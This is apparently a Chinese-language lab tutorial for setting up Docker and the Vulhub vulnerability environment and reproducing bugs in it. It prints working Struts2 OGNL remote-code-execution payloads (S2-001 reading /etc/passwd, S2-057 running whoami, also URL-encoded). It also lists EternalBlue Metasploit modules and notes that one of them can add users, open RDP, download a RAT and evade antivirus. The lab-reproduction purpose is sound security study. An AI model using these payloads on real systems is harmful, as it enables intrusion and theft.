目录
1.linux安装dokcer
- 因为Vulhub是一个基于docker和docker-compose的漏洞环境集合,所以,第一步我们需要安装docker
- 首先更新一下软件:
yum update
- 安装https协议、CA证书:
apt-get install -y apt-transport-https ca-certificates
- 安装docker:
apt install docker.io
- 查看是否安装成功:
docker -v
- 启动docker:
systemctl start docker
- 查看docker信息:
docker ps -a
- 安装pip:
apt-get install python3-pip
- 安装docker-compose:
pip3 install docker-compose
- 查看docker-compose版本:
docker-compose -v
2.kali安装docker
- 进入sources.lis重新编辑apt源
vim /etc/apt/sources.list
#安装哪个都可以,但是记得去掉#
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
#deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#浙大
#deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#东软大学
#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contribp.kali.org/kali kali-rolling main non-free contrib
#重庆大学
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib
- 进行系统或工具的更新
apt-get update && apt-get upgrade && apt-get dist-upgrade
注:当出现正在设定软件包界面时,直接按tab+enter进行确认 - 清除更新缓存
apt-get clean
- 安装docker
apt-get install docker docker-compose
- 启动docker服务
service docker start
- 列出docker现有镜像
docker images
- 运行hello-world镜像,但apt安装的docker没带有hello-world默认镜像呀,所以下面的命令不成功,它会帮你拉去该镜像下来
docker run hello-world
- 配置镜像加速器
vim /etc/docker/daemon.json
{
"registry-mirrors": ["https://zto7rr04.mirror.aliyuncs.com"]
}
- 重启docker
systemctl restart docker
- 开机自启
systemctl enable docker
- docker使用
#笔者以拉取 CVE-2017-7504 的漏洞环境为例。
docker search testjboss #搜索漏洞环境
docker pull testjboss/jboss #拉取漏洞环境
docker run -d -p 80:8080 testjboss/jboss:latest
#-p 6379:6379 端口映射:前表示主机部分,后表示容器部分
#根据testjboss/jboss镜像创建并运行容器
ifconfig #查看已运行容器ip
#kali中,使用浏览器访问http://IP #IP可为127.0.0.1
docker ps #查看正在运行的容器
docker exec -it e8f4844aabc1 /bin/bash #进入容器(id:e8f4844aabc1)
exit #退出容器到宿主机(容器不会停止运行)
docker stop 3b41c0c08430 #关闭容器(id唯一标识,建议使用id)
docker --help #查看docker命令
3.linux安装vulhub
- 下载安装vulhub:
git clone https://github.com/vulhub/vulhub.git
- 进入vulhub路径,查看里面的文件
- 进入靶场
- 开启靶场环境:
docker-compose up -d
- 测试连接:http://(linux的ip地址):端口/
- 关闭环境:
docker-compose down
4.s2-001复现
EXP
命令执行(命令加参数:new java.lang.String[]{“cat”,“/etc/passwd”})
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
5.s2-057复现
原理:
- alwaysSelectFullNamespace被设置为true,此时namespace的值是从URL中获取的。URL是可控的,所以namespace也是可控的。
- action元素没有名称空间属性集,或者使用通配符。该名称空间将由用户从URL传递并解析为OGNL表达式,最终导致远程代码执行的脆弱性。
url:
http://服务端ip:8080/struts2-showcase
PoC
例如目标地址为:http://127.0.0.1:8080/
1.
访问 http://127.0.0.1:8080/${(111+111)}/actionChain1.action
然后 URL 会变为 : http://127.0.0.1:8080/222/register2.action, 其中 222 部分为 ognl 表达式 ${(111+111)} 执行结果。
2.
whoami
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
url编码
%24%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%77%68%6f%61%6d%69%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d
访问 http://127.0.0.1:8080/编码/actionChain1.action
6.永恒之蓝(ms17-010)常用模块
- 扫描模块
auxiliary/scanner/smb/smb_ms17_010
- 攻击模块
auxiliary/amin/smb/ms17_010_command
该模块是所有利用方法中最为稳定的,并且不会被杀软拦截等。可以直接通过命令添加用户、开启3389、下载Rat等操作。
影响版本:windows server 2003、windows xp
–
exploit/windows/smb/ms17_010_psexec
需要命名管道开启
影响版本:windows server 2003、windows xp
–
exploit/windows/smb/ms17_010_eternalblue
影响版本:win7、win server 2008
存在ms17-010漏洞即可使用,不太稳定,容易被杀软识别,有概率导致目标机蓝屏
–
exploit/windows/smb/smb_doublepulsar_rce
双倍脉冲模块
- 加固:
禁用server服务
win+r搜索services.msc
7.遇到的问题
ModuleNotFoundError: No module named ‘setuptools_rust‘
pip3 install -U pip setuptools
安装docker-compose报【Read timed out】
#(官网安装地址,较慢,可以执行下面国内地址)
sudo curl -L "https://github.com/docker/compose/releases/download/1.29.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
#1.国内加速安装
curl -L https://get.daocloud.io/docker/compose/releases/download/1.24.1/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose
#2.Apply executable permissions to the binary
sudo chmod +x /usr/local/bin/docker-compose
#3.Test the installation.
docker-compose --version
运行docker-compose build报错
struts2 uses an image, skipping
如果执行的命令为:
docker-compose build --force XXX
因为这个命令直接指向image,所以无法执行,需要重新指示对应的配置文件:
docker-compose -f .\docker-compose.yml -f .\docker-compose.dev.yml build XXX